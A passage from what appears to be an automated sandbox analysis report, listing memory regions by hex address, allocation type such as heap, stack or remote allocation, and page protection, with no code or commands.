|
heap
|
page execute and read and write
|
||
24AEAA10000
|
heap
|
page read and write
|
||
44F0000
|
direct allocation
|
page execute and read and write
|
||
6E10000
|
heap
|
page read and write
|
||
F0000
|
unkown
|
page readonly
|
||
7E0000
|
unkown
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
4E10000
|
trusted library allocation
|
page read and write
|
||
63E000
|
heap
|
page read and write
|
||
7E90000
|
trusted library allocation
|
page read and write
|
||
840000
|
heap
|
page read and write
|
||
CAD000
|
heap
|
page read and write
|
||
6F86000
|
heap
|
page read and write
|
||
222CE000
|
stack
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
769E000
|
stack
|
page read and write
|
||
24AECC2F000
|
heap
|
page read and write
|
||
760000
|
unkown
|
page read and write
|
||
6E17000
|
heap
|
page read and write
|
||
D8D3AFB000
|
stack
|
page read and write
|
||
279AD09F000
|
heap
|
page read and write
|
||
2E90000
|
direct allocation
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
1C3B2000
|
system
|
page read and write
|
||
24AEC9A3000
|
heap
|
page read and write
|
||
956E7FE000
|
stack
|
page read and write
|
||
24A809F4000
|
trusted library allocation
|
page read and write
|
||
7861000
|
heap
|
page read and write
|
||
279AEF7F000
|
heap
|
page read and write
|
||
279AD0B1000
|
heap
|
page read and write
|
||
7FFD9BA20000
|
trusted library allocation
|
page read and write
|
||
279AF0D5000
|
heap
|
page read and write
|
||
ECE000
|
stack
|
page read and write
|
||
279AD05D000
|
heap
|
page read and write
|
||
80F000
|
heap
|
page read and write
|
||
24AECA05000
|
heap
|
page read and write
|
||
6F30000
|
heap
|
page read and write
|
||
5F0000
|
heap
|
page read and write
|
||
524000
|
heap
|
page read and write
|
||
100000
|
unkown
|
page readonly
|
||
7CF0000
|
trusted library allocation
|
page read and write
|
||
799D000
|
stack
|
page read and write
|
||
237745C0000
|
heap
|
page read and write
|
||
22B4E000
|
direct allocation
|
page execute and read and write
|
||
24AECA49000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
759D000
|
stack
|
page read and write
|
||
110000
|
unkown
|
page readonly
|
||
6B9000
|
heap
|
page read and write
|
||
110000
|
unkown
|
page readonly
|
||
7C0000
|
unkown
|
page readonly
|
||
7F00000
|
trusted library allocation
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
787A000
|
heap
|
page read and write
|
||
81B000
|
heap
|
page read and write
|
||
279AF064000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
7FF000
|
stack
|
page read and write
|
||
279AEF6F000
|
heap
|
page read and write
|
||
6F98000
|
heap
|
page read and write
|
||
4FC000
|
stack
|
page read and write
|
||
4AE9000
|
stack
|
page read and write
|
||
7F1E000
|
stack
|
page read and write
|
||
7FFD9BAA0000
|
trusted library allocation
|
page read and write
|
||
6E17000
|
heap
|
page read and write
|
||
279AEF4A000
|
heap
|
page read and write
|
||
279AEFA3000
|
heap
|
page read and write
|
||
1FE4000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
279AEE40000
|
heap
|
page read and write
|
||
279AF2B0000
|
heap
|
page read and write
|
||
1BF5C4A0000
|
heap
|
page read and write
|
||
520000
|
heap
|
page read and write
|
||
89CE000
|
stack
|
page read and write
|
||
F0000
|
unkown
|
page readonly
|
||
6B5000
|
system
|
page execute and read and write
|
||
24AEA8D0000
|
heap
|
page read and write
|
||
4832000
|
direct allocation
|
page execute and read and write
|
||
524000
|
heap
|
page read and write
|
||
279AEE66000
|
heap
|
page read and write
|
||
279AEFA2000
|
heap
|
page read and write
|
||
DD0000
|
heap
|
page read and write
|
||
24AEAB87000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
279AF132000
|
heap
|
page read and write
|
||
24AEAB78000
|
heap
|
page read and write
|
||
279AEFA2000
|
heap
|
page read and write
|
||
2E00000
|
heap
|
page read and write
|
||
2332000
|
unkown
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
79CF000
|
stack
|
page read and write
|
||
2DF0000
|
heap
|
page read and write
|
||
329D000
|
stack
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
279AEF7E000
|
heap
|
page read and write
|
||
6D8844B000
|
stack
|
page read and write
|
||
6F00000
|
direct allocation
|
page read and write
|
||
279AEDFB000
|
heap
|
page read and write
|
||
29F0000
|
heap
|
page read and write
|
||
24A902F0000
|
trusted library allocation
|
page read and write
|
||
24AEAD45000
|
heap
|
page read and write
|
||
279AEF22000
|
heap
|
page read and write
|
||
279AF0E6000
|
heap
|
page read and write
|
||
608000
|
heap
|
page read and write
|
||
4E00000
|
trusted library section
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
7FFD9B9D0000
|
trusted library allocation
|
page read and write
|
||
2C90000
|
heap
|
page read and write
|
||
740000
|
unkown
|
page read and write
|
||
5CE000
|
stack
|
page read and write
|
||
4F2E000
|
stack
|
page read and write
|
||
4B3C000
|
stack
|
page read and write
|
||
22ADD000
|
direct allocation
|
page execute and read and write
|
||
78CA000
|
heap
|
page read and write
|
||
6D7000
|
heap
|
page read and write
|
||
279AEE66000
|
heap
|
page read and write
|
||
2320000
|
heap
|
page read and write
|
||
279AEDE1000
|
heap
|
page read and write
|
||
279AEDC2000
|
heap
|
page read and write
|
||
3250000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
9833000
|
direct allocation
|
page execute and read and write
|
||
446F000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
279AD013000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
3520000
|
heap
|
page read and write
|
||
6D8834D000
|
stack
|
page read and write
|
||
24AECA0F000
|
heap
|
page read and write
|
||
24A81ABE000
|
trusted library allocation
|
page read and write
|
||
279AEF0F000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
279AF0AC000
|
heap
|
page read and write
|
||
212F0680000
|
heap
|
page read and write
|
||
21F10000
|
direct allocation
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
279AEF7E000
|
heap
|
page read and write
|
||
24A8090E000
|
trusted library allocation
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
613000
|
heap
|
page read and write
|
||
D8D36FD000
|
stack
|
page read and write
|
||
165000
|
unkown
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
524000
|
heap
|
page read and write
|
||
3299000
|
stack
|
page read and write
|
||
7400000
|
heap
|
page execute and read and write
|
||
CA1000
|
heap
|
page read and write
|
||
58E000
|
stack
|
page read and write
|
||
4B2B000
|
stack
|
page read and write
|
||
1C5CC000
|
system
|
page read and write
|
||
279AEFA2000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
4FFE000
|
stack
|
page read and write
|
||
7FFD9B920000
|
trusted library allocation
|
page execute and read and write
|
||
783F000
|
heap
|
page read and write
|
||
24AEAB8E000
|
heap
|
page read and write
|
||
1BF5C4D3000
|
heap
|
page read and write
|
||
279AEDD5000
|
heap
|
page read and write
|
||
21A0000
|
unkown
|
page readonly
|
||
279AEDA0000
|
heap
|
page read and write
|
||
24A80082000
|
trusted library allocation
|
page read and write
|
||
279AEDA5000
|
heap
|
page read and write
|
||
8F0000
|
unkown
|
page readonly
|
||
279AEF14000
|
heap
|
page read and write
|
||
956EFFE000
|
stack
|
page read and write
|
||
7E2D000
|
stack
|
page read and write
|
||
2E90000
|
direct allocation
|
page read and write
|
||
7FFD9BA50000
|
trusted library allocation
|
page read and write
|
||
7FFD9B75D000
|
trusted library allocation
|
page execute and read and write
|
||
2248E000
|
stack
|
page read and write
|
||
2110000
|
unkown
|
page readonly
|
||
279AEF2F000
|
heap
|
page read and write
|
||
78A4000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
6019000
|
trusted library allocation
|
page read and write
|
||
23774350000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
34CE000
|
stack
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
6F86000
|
heap
|
page read and write
|
||
279AD021000
|
heap
|
page read and write
|
||
8F40000
|
direct allocation
|
page read and write
|
||
8E70000
|
trusted library allocation
|
page read and write
|
||
4FD000
|
stack
|
page read and write
|
||
24AEAAD0000
|
heap
|
page read and write
|
||
279AEF3E000
|
heap
|
page read and write
|
||
5145000
|
trusted library allocation
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
24AEAD20000
|
trusted library allocation
|
page read and write
|
||
4E52000
|
trusted library allocation
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
279AF0AC000
|
heap
|
page read and write
|
||
7CC7000
|
trusted library allocation
|
page read and write
|
||
167000
|
unkown
|
page readonly
|
||
6FA2000
|
heap
|
page read and write
|
||
2FEE000
|
stack
|
page read and write
|
||
7F8000
|
heap
|
page read and write
|
||
24AECC57000
|
heap
|
page read and write
|
||
279AEDD5000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
212F0550000
|
heap
|
page read and write
|
||
442E000
|
stack
|
page read and write
|
||
21EF0000
|
direct allocation
|
page read and write
|
||
783E000
|
heap
|
page read and write
|
||
7CDA000
|
trusted library allocation
|
page read and write
|
||
279ACF20000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
24AEC470000
|
heap
|
page execute and read and write
|
||
8E60000
|
trusted library allocation
|
page read and write
|
||
784D000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
251F1000
|
unclassified section
|
page execute and read and write
|
||
779E000
|
stack
|
page read and write
|
||
77E0000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
751000
|
unkown
|
page readonly
|
||
78D6000
|
heap
|
page read and write
|
||
7FFD9BA10000
|
trusted library allocation
|
page read and write
|
||
260C000
|
unkown
|
page read and write
|
||
F0000
|
unkown
|
page readonly
|
||
CA1000
|
heap
|
page read and write
|
||
7915000
|
heap
|
page read and write
|
||
4F60000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
7CC0000
|
trusted library allocation
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
CA0000
|
heap
|
page read and write
|
||
C033000
|
direct allocation
|
page execute and read and write
|
||
279AEEDE000
|
heap
|
page read and write
|
||
24AECC5E000
|
heap
|
page read and write
|
||
279AEDCF000
|
heap
|
page read and write
|
||
24AECC7C000
|
heap
|
page read and write
|
||
8F0000
|
unkown
|
page readonly
|
||
279AD0AC000
|
heap
|
page read and write
|
||
709000
|
system
|
page execute and read and write
|
||
24AEC9A1000
|
heap
|
page read and write
|
||
D8D30FE000
|
stack
|
page read and write
|
||
24A80518000
|
trusted library allocation
|
page read and write
|
||
7DBD000
|
stack
|
page read and write
|
||
4BEE000
|
stack
|
page read and write
|
||
5FF1000
|
trusted library allocation
|
page read and write
|
||
165000
|
unkown
|
page read and write
|
||
2FFE000
|
stack
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
89D0000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
279AEDA4000
|
heap
|
page read and write
|
||
279AEF9E000
|
heap
|
page read and write
|
||
7FFD9B7AC000
|
trusted library allocation
|
page execute and read and write
|
||
24A81DBB000
|
trusted library allocation
|
page read and write
|
||
2299E000
|
heap
|
page read and write
|
||
2238F000
|
stack
|
page read and write
|
||
608000
|
heap
|
page read and write
|
||
279AEF9E000
|
heap
|
page read and write
|
||
510000
|
heap
|
page read and write
|
||
7FFD9B810000
|
trusted library allocation
|
page execute and read and write
|
||
279AEFA3000
|
heap
|
page read and write
|
||
279AEF7E000
|
heap
|
page read and write
|
||
49D947C000
|
stack
|
page read and write
|
||
1BA000
|
stack
|
page read and write
|
||
279AEEB1000
|
heap
|
page read and write
|
||
279AEDAA000
|
heap
|
page read and write
|
||
4CA0000
|
heap
|
page read and write
|
||
279ACFF4000
|
heap
|
page read and write
|
||
151000
|
unkown
|
page execute read
|
||
24AEA9D0000
|
heap
|
page read and write
|
||
3CF1000
|
unkown
|
page execute and read and write
|
||
461D000
|
direct allocation
|
page execute and read and write
|
||
22779000
|
heap
|
page read and write
|
||
279AEEC1000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
165000
|
unkown
|
page read and write
|
||
279AEF1A000
|
heap
|
page read and write
|
||
348E000
|
stack
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
279AD0AB000
|
heap
|
page read and write
|
||
338E000
|
unkown
|
page read and write
|
||
279AD00D000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
24A809B8000
|
trusted library allocation
|
page read and write
|
||
78B6000
|
heap
|
page read and write
|
||
7A0E000
|
stack
|
page read and write
|
||
279AEEFF000
|
heap
|
page read and write
|
||
6E6E000
|
stack
|
page read and write
|
||
279AF07C000
|
heap
|
page read and write
|
||
2E50000
|
heap
|
page read and write
|
||
800000
|
unkown
|
page readonly
|
||
7EF0000
|
trusted library allocation
|
page read and write
|
||
279AF0AC000
|
heap
|
page read and write
|
||
279AEFA3000
|
heap
|
page read and write
|
||
4920000
|
heap
|
page read and write
|
||
2D50000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
2ED0000
|
direct allocation
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
279AEDCC000
|
heap
|
page read and write
|
||
23D83000
|
unclassified section
|
page execute and read and write
|
||
212F06D0000
|
heap
|
page read and write
|
||
78F6000
|
heap
|
page read and write
|
||
279AEF9E000
|
heap
|
page read and write
|
||
279AEEDE000
|
heap
|
page read and write
|
||
7940000
|
trusted library allocation
|
page read and write
|
||
751000
|
unkown
|
page readonly
|
||
35C8000
|
heap
|
page read and write
|
||
2000000
|
heap
|
page read and write
|
||
279AF077000
|
heap
|
page read and write
|
||
279AEDEB000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
1BF5DF0E000
|
trusted library allocation
|
page read and write
|
||
1BF5C4D3000
|
heap
|
page read and write
|
||
840000
|
trusted library allocation
|
page read and write
|
||
279AEE1F000
|
heap
|
page read and write
|
||
279AEE53000
|
heap
|
page read and write
|
||
44EC000
|
stack
|
page read and write
|
||
B90000
|
unkown
|
page readonly
|
||
CA1000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
6D8727F000
|
stack
|
page read and write
|
||
279AEEE3000
|
heap
|
page read and write
|
||
24A81E2C000
|
trusted library allocation
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
2234E000
|
stack
|
page read and write
|
||
24AEC950000
|
heap
|
page read and write
|
||
130000
|
unkown
|
page read and write
|
||
7A70000
|
heap
|
page execute and read and write
|
||
279AEEF1000
|
heap
|
page read and write
|
||
279AEDB4000
|
heap
|
page read and write
|
||
CB0000
|
heap
|
page read and write
|
||
7F10000
|
trusted library allocation
|
page read and write
|
||
279AEEE4000
|
heap
|
page read and write
|
||
697000
|
heap
|
page read and write
|
||
4FE0000
|
heap
|
page execute and read and write
|
||
1BF5DDC0000
|
trusted library allocation
|
page read and write
|
||
624000
|
heap
|
page read and write
|
||
24AEAB18000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
D8D34FE000
|
stack
|
page read and write
|
||
279AEDB3000
|
heap
|
page read and write
|
||
8F30000
|
direct allocation
|
page read and write
|
||
7FFD9BAD0000
|
trusted library allocation
|
page read and write
|
||
89F0000
|
trusted library allocation
|
page read and write
|
||
279AEDF3000
|
heap
|
page read and write
|
||
279AEF7A000
|
heap
|
page read and write
|
||
279AF060000
|
heap
|
page read and write
|
||
279AEF9E000
|
heap
|
page read and write
|
||
279AEF7B000
|
heap
|
page read and write
|
||
4E20000
|
trusted library allocation
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
212F06C0000
|
heap
|
page read and write
|
||
21F20000
|
direct allocation
|
page read and write
|
||
279AEE66000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
40000
|
unkown
|
page readonly
|
||
1BF5E0CE000
|
trusted library allocation
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
4F50000
|
trusted library allocation
|
page read and write
|
||
47BD000
|
direct allocation
|
page execute and read and write
|
||
CA1000
|
heap
|
page read and write
|
||
279AEDD1000
|
heap
|
page read and write
|
||
279AEF84000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
23F2000
|
unkown
|
page read and write
|
||
24A8204F000
|
trusted library allocation
|
page read and write
|
||
7FFD9B990000
|
trusted library allocation
|
page read and write
|
||
7FFD9B76B000
|
trusted library allocation
|
page read and write
|
||
4473000
|
heap
|
page read and write
|
||
279AEF9E000
|
heap
|
page read and write
|
||
3200000
|
remote allocation
|
page execute and read and write
|
||
1FDE000
|
stack
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
8C63000
|
heap
|
page read and write
|
||
2D70000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
8FE0000
|
direct allocation
|
page read and write
|
||
7E50000
|
trusted library allocation
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
7FFD9B806000
|
trusted library allocation
|
page read and write
|
||
608000
|
heap
|
page read and write
|
||
E90000
|
trusted library allocation
|
page read and write
|
||
7C0000
|
unkown
|
page readonly
|
||
100000
|
heap
|
page read and write
|
||
2332000
|
unkown
|
page read and write
|
||
2ED0000
|
direct allocation
|
page read and write
|
||
279AEDC4000
|
heap
|
page read and write
|
||
7849000
|
heap
|
page read and write
|
||
6D2000
|
heap
|
page read and write
|
||
279AEFA2000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
279AEF7F000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
900000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
24A8040B000
|
trusted library allocation
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
279ACFC5000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
8E40000
|
trusted library allocation
|
page read and write
|
||
6A6000
|
system
|
page execute and read and write
|
||
2EAA000
|
unkown
|
page read and write
|
||
279AEF25000
|
heap
|
page read and write
|
||
7DFE000
|
stack
|
page read and write
|
||
2E08000
|
heap
|
page read and write
|
||
956FFFE000
|
stack
|
page read and write
|
||
279AEDD2000
|
heap
|
page read and write
|
||
279AF1BF000
|
heap
|
page read and write
|
||
F0D000
|
stack
|
page read and write
|
||
4AAB000
|
stack
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
77DF000
|
stack
|
page read and write
|
||
608000
|
heap
|
page read and write
|
||
7EA0000
|
trusted library allocation
|
page read and write
|
||
279AEDB8000
|
heap
|
page read and write
|
||
279AD0BC000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
229B0000
|
direct allocation
|
page execute and read and write
|
||
4E23000
|
trusted library allocation
|
page execute and read and write
|
||
279AD0A1000
|
heap
|
page read and write
|
||
2F70000
|
heap
|
page read and write
|
||
212F058B000
|
heap
|
page read and write
|
||
7FFD9B760000
|
trusted library allocation
|
page read and write
|
||
4DF0000
|
trusted library section
|
page read and write
|
||
788A000
|
heap
|
page read and write
|
||
7F5F000
|
stack
|
page read and write
|
||
5B53000
|
remote allocation
|
page execute and read and write
|
||
CA1000
|
heap
|
page read and write
|
||
15E000
|
unkown
|
page readonly
|
||
468E000
|
direct allocation
|
page execute and read and write
|
||
2EED000
|
stack
|
page read and write
|
||
279AEEFC000
|
heap
|
page read and write
|
||
600000
|
heap
|
page read and write
|
||
78BC000
|
heap
|
page read and write
|
||
78A9000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
23774270000
|
heap
|
page read and write
|
||
495C000
|
unclassified section
|
page read and write
|
||
4F4E000
|
stack
|
page read and write
|
||
212F0580000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
524000
|
heap
|
page read and write
|
||
4C00000
|
heap
|
page read and write
|
||
279AEF1D000
|
heap
|
page read and write
|
||
279AEE33000
|
heap
|
page read and write
|
||
4970000
|
heap
|
page read and write
|
||
1BF5C470000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
1F0000
|
unkown
|
page readonly
|
||
4ECE000
|
stack
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
279AEDED000
|
heap
|
page read and write
|
||
279AEDB8000
|
heap
|
page read and write
|
||
78BB000
|
heap
|
page read and write
|
||
1BF5C3BE000
|
system
|
page execute and read and write
|
||
CA1000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
7FFD9B800000
|
trusted library allocation
|
page read and write
|
||
279AEE30000
|
heap
|
page read and write
|
||
24AECC83000
|
heap
|
page read and write
|
||
7FFD9B960000
|
trusted library allocation
|
page read and write
|
||
279AEE48000
|
heap
|
page read and write
|
||
279AF06E000
|
heap
|
page read and write
|
||
24AEC360000
|
trusted library allocation
|
page read and write
|
||
7AFB000
|
heap
|
page read and write
|
||
279AEE22000
|
heap
|
page read and write
|
||
279AEF3C000
|
heap
|
page read and write
|
||
8C3C000
|
stack
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
7B15000
|
heap
|
page read and write
|
||
6D878FB000
|
stack
|
page read and write
|
||
E90000
|
trusted library allocation
|
page read and write
|
||
6D86F0E000
|
stack
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
24AECAC0000
|
heap
|
page read and write
|
||
24AECAE3000
|
heap
|
page read and write
|
||
279AEF3E000
|
heap
|
page read and write
|
||
798E000
|
stack
|
page read and write
|
||
24A81E8E000
|
trusted library allocation
|
page read and write
|
||
7DF4E3090000
|
trusted library allocation
|
page execute and read and write
|
||
279AEFA3000
|
heap
|
page read and write
|
||
7FFD9B754000
|
trusted library allocation
|
page read and write
|
||
3330000
|
heap
|
page read and write
|
||
279AEF23000
|
heap
|
page read and write
|
||
20000
|
unkown
|
page readonly
|
||
7E7E000
|
stack
|
page read and write
|
||
24A809A4000
|
trusted library allocation
|
page read and write
|
||
8FC0000
|
direct allocation
|
page read and write
|
||
53BA000
|
unclassified section
|
page read and write
|
||
279AEE0B000
|
heap
|
page read and write
|
||
279AEF04000
|
heap
|
page read and write
|
||
279AEE52000
|
heap
|
page read and write
|
||
165000
|
unkown
|
page read and write
|
||
167000
|
unkown
|
page readonly
|
||
24AECBC0000
|
heap
|
page read and write
|
||
279AD022000
|
heap
|
page read and write
|
||
613000
|
heap
|
page read and write
|
||
279AEE0E000
|
heap
|
page read and write
|
||
279AF0D5000
|
heap
|
page read and write
|
||
1BF5DF13000
|
trusted library allocation
|
page read and write
|
||
7AA0000
|
heap
|
page read and write
|
||
613000
|
heap
|
page read and write
|
||
51CC000
|
stack
|
page read and write
|
||
4E39000
|
trusted library allocation
|
page read and write
|
||
279AEDA1000
|
heap
|
page read and write
|
||
1C0000
|
unkown
|
page read and write
|
||
15E000
|
unkown
|
page readonly
|
||
88F0000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
29F4000
|
unkown
|
page read and write
|
||
4FAE000
|
stack
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
279AD0D3000
|
heap
|
page read and write
|
||
279AEFA2000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
8C5B000
|
heap
|
page read and write
|
||
7AD0000
|
heap
|
page read and write
|
||
605E000
|
trusted library allocation
|
page read and write
|
||
24AECCB5000
|
heap
|
page read and write
|
||
279AEFAE000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
2320000
|
heap
|
page read and write
|
||
7CD0000
|
trusted library allocation
|
page read and write
|
||
740000
|
unkown
|
page read and write
|
||
50F1000
|
unkown
|
page execute and read and write
|
||
1BF5DE00000
|
trusted library allocation
|
page read and write
|
||
279AEDCF000
|
heap
|
page read and write
|
||
8C5F000
|
heap
|
page read and write
|
||
279AEF84000
|
heap
|
page read and write
|
||
279AF0C9000
|
heap
|
page read and write
|
||
279AEF2C000
|
heap
|
page read and write
|
||
279AEF08000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
279AEDC0000
|
heap
|
page read and write
|
||
1BE000
|
stack
|
page read and write
|
||
7FFD9B750000
|
trusted library allocation
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
279AEDBD000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
7405000
|
heap
|
page execute and read and write
|
||
279AEFAA000
|
heap
|
page read and write
|
||
279AEFA2000
|
heap
|
page read and write
|
||
8FF0000
|
direct allocation
|
page read and write
|
||
22AD9000
|
direct allocation
|
page execute and read and write
|
||
279AEF0F000
|
heap
|
page read and write
|
||
2E52000
|
heap
|
page read and write
|
||
7FFD9BA40000
|
trusted library allocation
|
page read and write
|
||
279AEDB5000
|
heap
|
page read and write
|
||
212F06C5000
|
heap
|
page read and write
|
||
6F10000
|
direct allocation
|
page read and write
|
||
23DF1000
|
unclassified section
|
page execute and read and write
|
||
8A35000
|
trusted library allocation
|
page read and write
|
||
223CD000
|
stack
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
24A80547000
|
trusted library allocation
|
page read and write
|
||
1BF5DF03000
|
trusted library allocation
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
279AEDBA000
|
heap
|
page read and write
|
||
2264C000
|
stack
|
page read and write
|
||
46F1000
|
unkown
|
page execute and read and write
|
||
279AEE4D000
|
heap
|
page read and write
|
||
279AEF7F000
|
heap
|
page read and write
|
||
D8D33FE000
|
stack
|
page read and write
|
||
351C000
|
heap
|
page read and write
|
||
151000
|
unkown
|
page execute read
|
||
CA1000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
24AECAE0000
|
heap
|
page read and write
|
||
24AECBDA000
|
heap
|
page read and write
|
||
24AEC600000
|
heap
|
page read and write
|
||
2E47000
|
heap
|
page read and write
|
||
279AEF7B000
|
heap
|
page read and write
|
||
6EE0000
|
direct allocation
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
279AEE5A000
|
heap
|
page read and write
|
||
151000
|
unkown
|
page execute read
|
||
22651000
|
heap
|
page read and write
|
||
3353000
|
remote allocation
|
page execute and read and write
|
||
2190000
|
heap
|
page read and write
|
||
2C89000
|
heap
|
page read and write
|
||
279AEE58000
|
heap
|
page read and write
|
||
279AD07F000
|
heap
|
page read and write
|
||
7E80000
|
trusted library allocation
|
page read and write
|
||
1BF5C4BC000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
956F7FE000
|
stack
|
page read and write
|
||
279AEFAB000
|
heap
|
page read and write
|
||
279AEF9E000
|
heap
|
page read and write
|
||
279AEDDA000
|
heap
|
page read and write
|
||
3407000
|
heap
|
page read and write
|
||
279AF07B000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
514E000
|
stack
|
page read and write
|
||
CA33000
|
direct allocation
|
page execute and read and write
|
||
78DD000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
293B000
|
stack
|
page read and write
|
||
49D94FE000
|
stack
|
page read and write
|
||
279AEDBB000
|
heap
|
page read and write
|
||
78EC000
|
heap
|
page read and write
|
||
247F1000
|
unclassified section
|
page execute and read and write
|
||
78E2000
|
heap
|
page read and write
|
||
279AF063000
|
heap
|
page read and write
|
||
24AEAB1F000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
78AF000
|
heap
|
page read and write
|
||
279AEDFE000
|
heap
|
page read and write
|
||
150000
|
unkown
|
page readonly
|
||
279AEF84000
|
heap
|
page read and write
|
||
279AEFAE000
|
heap
|
page read and write
|
||
279AEF84000
|
heap
|
page read and write
|
||
78B6000
|
heap
|
page read and write
|
||
800000
|
unkown
|
page readonly
|
||
CA1000
|
heap
|
page read and write
|
||
73EE000
|
stack
|
page read and write
|
||
279AEE17000
|
heap
|
page read and write
|
||
24AECCA5000
|
heap
|
page read and write
|
||
279AEF84000
|
heap
|
page read and write
|
||
279AEED6000
|
heap
|
page read and write
|
||
8EA0000
|
trusted library allocation
|
page execute and read and write
|
||
CA1000
|
heap
|
page read and write
|
||
24AEAA50000
|
trusted library allocation
|
page read and write
|
||
7885000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
279AD09F000
|
heap
|
page read and write
|
||
24A902FF000
|
trusted library allocation
|
page read and write
|
||
73AE000
|
stack
|
page read and write
|
||
279AF0AC000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
24A809B0000
|
trusted library allocation
|
page read and write
|
||
7880000
|
heap
|
page read and write
|
||
24AEAAD5000
|
heap
|
page read and write
|
||
B633000
|
direct allocation
|
page execute and read and write
|
||
3D53000
|
remote allocation
|
page execute and read and write
|
||
23774170000
|
heap
|
page read and write
|
||
24AEC3D0000
|
heap
|
page execute and read and write
|
||
7B80000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
6F98000
|
heap
|
page read and write
|
||
7ED0000
|
trusted library allocation
|
page read and write
|
||
6D86FCF000
|
stack
|
